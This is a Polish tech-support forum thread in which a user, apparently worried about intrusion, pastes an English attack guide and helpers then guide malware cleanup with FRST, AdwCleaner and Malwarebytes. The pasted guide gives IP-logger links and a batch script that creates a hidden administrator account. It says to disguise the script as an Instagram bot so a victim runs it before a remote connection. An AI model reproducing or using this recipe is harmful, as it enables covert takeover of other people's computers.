@jajecpl oto ten skrypt z instrukcją

first of all, you need the IP Address

IP Address: Generate a Link which you send to your victim. If he clicks it, his IP will be sent to your email inbox.

http://getthierip.com
http://whatstheirip.com

• then, open up notepad and write this commands:

cd
cls
REM “WhatEverYouWantNameIt”
REM ------------------------------
@echo off
set /p user=PLS INSERT YOUR USER :
set /p pass= PLS INSERT YOUR PASSWORD :
net user /add %user% %pass%
net localgroup administrators /add %user%
reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist” /v %user% /t REG_DWORD /d 0
pause

• it’s done! save it as the batch file (.bat)
• named whatever you want,

ok after get him IP address you need to give them this batch file!
for that, you can change it to .exe file or put this Batch in a program file, you can put in an instagrambot or viewbot or anything, and name it to program name! and told the victim to open it first! if he/she click on it make a HiddenUser on the Computer
and what you gonna do is connect him with Remote access app(you can find it on windows search bar) and IP address you got before!

Można te punkty napisać tak żebym mógł zrozumieć

Robiłem restart laptopa i nie ma żadnych problemów ale się boję że w końcu dobije się ponownie do mnie

Napisałem, co masz zrobić i zignorowałeś. Na 100% jest syf. I najpierw oceniłby to np. @iJuliusz po logach. I możeby się obeszło bez formatów.

czyli mam zrobić to co pierwsze napisałeś??

Dokładnie. Wrzucić logi do tematu. Link do instrukcji podałem.

z kąd te logi. jak to chciałem pobrać to pisało ze windows obronil komputer

Shortcut.txt (32,9 KB) Addition.txt (40,4 KB) FRST.txt (147,6 KB)

Krótkie objaśnienie. Logi tworzysz za pomocą frst na twoim sprzęcie. Link jest tylko z instrukcją jak to zrobić i jak przykładowo się zapisują logi.

Te komendy z pliku .bat tworzą w systemie użytkownika z hasłem, które podajesz w trakcie jego działania, a następnie dodają go do grupy “administratorzy” i ukrywają z ekranu logowania.
Tak działało to w XP, gdzie sam to robiłem, ale czy to działa tak w Windows 10, to nie wiem. Mówię oczywiście o ukrywaniu konta.

Samo konto, które zakładasz jest lokalne, bez znajomości tych danych jednak nikt na nie się nie zaloguje. Nawet znając IP.

Oczywiście jak ktoś poda komuś innemu te dane i jednocześnie zainstaluje sobie jakieś VNC, to sprawa się komplikuje, no ale…

już chyba zrobiłem logi to ten plik tekstowy

czyli co mam zrobic

Ten wpis został oflagowany przez społeczność i został tymczasowo ukryty.

Witaj @Kuzaj420

Przejrzałem logi.
Spróbujmy zresetować niektóre ustawienia i troszkę oczyścić system

1. Pobierz ten plik i zapisz w katalogu z FRST, tzn. C:\Users\popro\Downloads
   fixlist.txt (3,2 KB)
   “Plik naprawczy został utworzony tylko dla Ciebie, nie należy go stosować na innym komputerze”
2. Uruchom FRST i kliknij Napraw, program wyłączy niepotrzebne procesy, zrobi Punkt Przywracania i zacznie pracę.
3. Po restarcie wklej plik wynikowy.
4. Pobierz ADWCleaner
5. Uruchom z Uprawnieniami Administratora, uruchom skanowanie.
   Jeśli znajdzie linie z Preinstalled to odznacz, resztę oczyść
6. Wklej plik wynikowy.

Daj znać, czy McAfee nadal zgłasza połączenia

Dodam jeszcze, że port 56197 może należeć do oprogramowania Apple
https://www.adminsub.net/tcp-udp-port-finder/56197
i McAfee próbuje to ciągle blokować

Fixlog.txt (8,9 KB)

@iJuliusz

Odnoszę wrażenie, że McAfee ma zbyt rygorystyczne ustawienia FireWall

ADWCleaner nic nie znalazł
Teraz MBAM
Zrób skanowanie MBAM

• Pobierz MalwareBytes MBAM
• Zamknij wszystkie aktywne programy i przeglądarki.
• Zainstaluj MBAM, zaznacz na końcu, aby uruchomił się po zakończeniu instalacji.
• Wejdź w Ustawienia w Prawym górnym rogu
• Zakładka Bezpieczeństwo
• W Opcjach skanowania zaznacz trzy pierwsze z czterech dostępnych
• Wróć do Głównego Menu
• Rozpocznij skanowanie, po przeskanowaniu oczyść to co znajdzie, wklej plik wynikowy.